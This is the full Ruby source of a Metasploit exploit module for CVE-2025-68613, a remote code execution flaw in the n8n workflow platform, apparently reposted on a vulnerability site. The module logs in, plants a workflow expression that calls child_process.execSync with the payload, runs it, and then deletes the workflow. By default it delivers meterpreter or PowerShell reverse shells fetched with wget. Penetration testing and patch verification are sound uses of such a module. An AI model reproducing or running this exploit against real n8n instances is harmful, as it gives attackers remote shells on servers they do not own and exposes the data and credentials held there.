n8n Workflow Expression Remote Code Execution
##
# This module requires Metasploit: n8n Workflow Expression Remote Code Execution
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'n8n Workflow Expression Remote Code Execution',
'Description' => %q{
This module exploits a critical remote code execution vulnerability (CVE-2025-68613)
in the n8n workflow automation platform. The vulnerability exists in the workflow
expression evaluation system where user-supplied expressions enclosed in {{ }}
are evaluated in an execution context that is not sufficiently isolated from the
underlying Node.js runtime.
An authenticated attacker can create a workflow containing malicious expressions
that access the Node.js process object via this.process.mainModule.require (or via
the constructor) to load child_process and execute arbitrary system commands.
This module uses a Schedule Trigger node to automatically fire and evaluate the
malicious payload. This requires valid credentials to create workflows.
Successful exploitation may lead to full compromise of the n8n instance,
including unauthorized access to sensitive data, modification of workflows,
and execution of system-level operations.
Affected versions: >= 0.211.0 and < 1.120.4, < 1.121.1, < 1.122.0
},
'Author' => [
'Lukas Johannes M?ller'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2025-68613'],
['URL', 'https://github.com/n8n-io/n8n/security/advisories'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2025-68613']
],
'Platform' => ['unix', 'linux', 'win'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix/Linux Command',
{
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
# cmd/unix payloads use commands that might not be present in docker instance
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
'FETCH_COMMAND' => 'wget'
}
}
],
[
'Windows Command',
{
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Type' => :win_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
}
}
]
],
'Payload' => {
'BadChars' => %(')
},
'Privileged' => false,
'DisclosureDate' => '2025-06-10',
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 5678,
'SSL' => false
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path to n8n', '/']),
OptString.new('USERNAME', [true, 'n8n username or email for authentication']),
OptString.new('PASSWORD', [true, 'n8n password for authentication'])
]
)
end
def check
return CheckCode::Unknown('Could not authenticate to n8n') unless authenticate
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest', 'settings')
)
return CheckCode::Unknown('Could not connect to n8n') if res.blank?
return CheckCode::Detected('Connected to n8n, received unexpected response') unless res.code == 200
json = res.get_json_document
version = Rex::Version.new(json.dig('data', 'versionCli'))
return CheckCode::Detected('n8n detected but could not determine version') unless version
print_status("Detected n8n version: #{version}")
return CheckCode::Appears("Version #{version} is vulnerable") if version.between?(Rex::Version.new('0.211.0'), Rex::Version.new('1.120.4')) || version == Rex::Version.new('1.121.0')
CheckCode::Safe("Version #{version} is not vulnerable")
end
def authenticate
print_status('Attempting to authenticate...')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => {
'emailOrLdapLoginId' => datastore['USERNAME'],
'email' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}.to_json
)
return true if res&.code == 200
json_data = res.get_json_document
print_error("Login failed: #{json_data['message']}")
false
end
def create_malicious_workflow(cmd)
expression_payload = %<{{ (function(){ return this.process.mainModule.require('child_process').execSync('#{cmd}').toString() })() }}>
@workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
workflow_data = {
'name' => @workflow_name,
'active' => false,
'settings' => {
'saveDataErrorExecution' => 'all',
'saveDataSuccessExecution' => 'all',
'saveManualExecutions' => true,
'executionOrder' => 'v1'
},
'nodes' => [
{
parameters: {},
type: 'n8n-nodes-base.manualTrigger',
typeVersion: 1,
position: [
0,
0
],
'id' => Rex::Text.rand_text_alphanumeric(36),
name: "When clicking 'Execute workflow'"
},
{
parameters: {
values: {
string: [
{
value: "=#{expression_payload}"
}
]
},
options: {}
},
id: '40031677-e085-4434-9168-fb0b21ead60d',
name: 'Set',
type: 'n8n-nodes-base.set',
typeVersion: 1,
position: [
220,
0
]
}
],
'connections' => {
"When clicking 'Execute workflow'" => {
'main' => [
[
{
'node' => 'Set',
'type' => 'main',
'index' => 0
}
]
]
}
}
}
print_status('Creating malicious workflow...')
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => workflow_data.to_json
)
fail_with(Failure::UnexpectedReply, "Failed to create workflow: #{res&.code}") unless res&.code == 200 || res&.code == 201
json = res.get_json_document
@workflow_id = json.dig('data', 'id') || json['id']
nodes = json.dig('data', 'nodes')
version_id = json.dig('data', 'versionId')
id = json.dig('data', 'id')
fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response') unless @workflow_id && nodes && version_id && id
activation_data = {
'workflowData' => {
'name' => @workflow_name,
'nodes' => nodes,
'pinData' => {},
'connections' => {
"When clicking 'Execute workflow'" => {
'main' => [
[
{
'node' => 'Set',
'type' => 'main',
'index' => 0
}
]
]
}
},
'active' => false,
'settings' => {
'saveDataErrorExecution' => 'all',
'saveDataSuccessExecution' => 'all',
'saveManualExecutions' => true,
'executionOrder' => 'v1'
},
'tags' => [],
'versionId' => version_id,
'meta' => 'null',
'id' => id
},
'startNodes' => [],
'destinationNode' => 'Set'
}
print_status('Triggering malicious workflow...')
# older versions on n8n allow to execute workflow without workflow ID, while the newer versions
# have URI rest/workflow/[workflow ID]/run available to make workflow run. If the first request
# returns 404, it means that it is probably newer version, so module will try the second variant.
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', 'run'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => activation_data.to_json
)
if res&.code == 404
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
'ctype' => 'application/json',
'keep_cookies' => true,
'data' => activation_data.to_json
)
end
fail_with(Failure::PayloadFailed, 'Could not start workflow') unless res&.code == 200
print_good("Created workflow with ID: #{@workflow_id}")
end
def archive_workflow
print_status("Cleaning up workflow #{@workflow_id}...")
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'archive'),
'keep_cookies' => true
)
end
def exploit
cookie_jar.clear
fail_with(Failure::NoAccess, 'Could not authenticate') unless authenticate
create_malicious_workflow(payload.encoded)
end
def cleanup
super
if @workflow_id
archive_workflow
# delete workflow
send_request_cgi(
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s)
)
end
end
end
n8n Workflow Expression Remote Code Execution
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 201
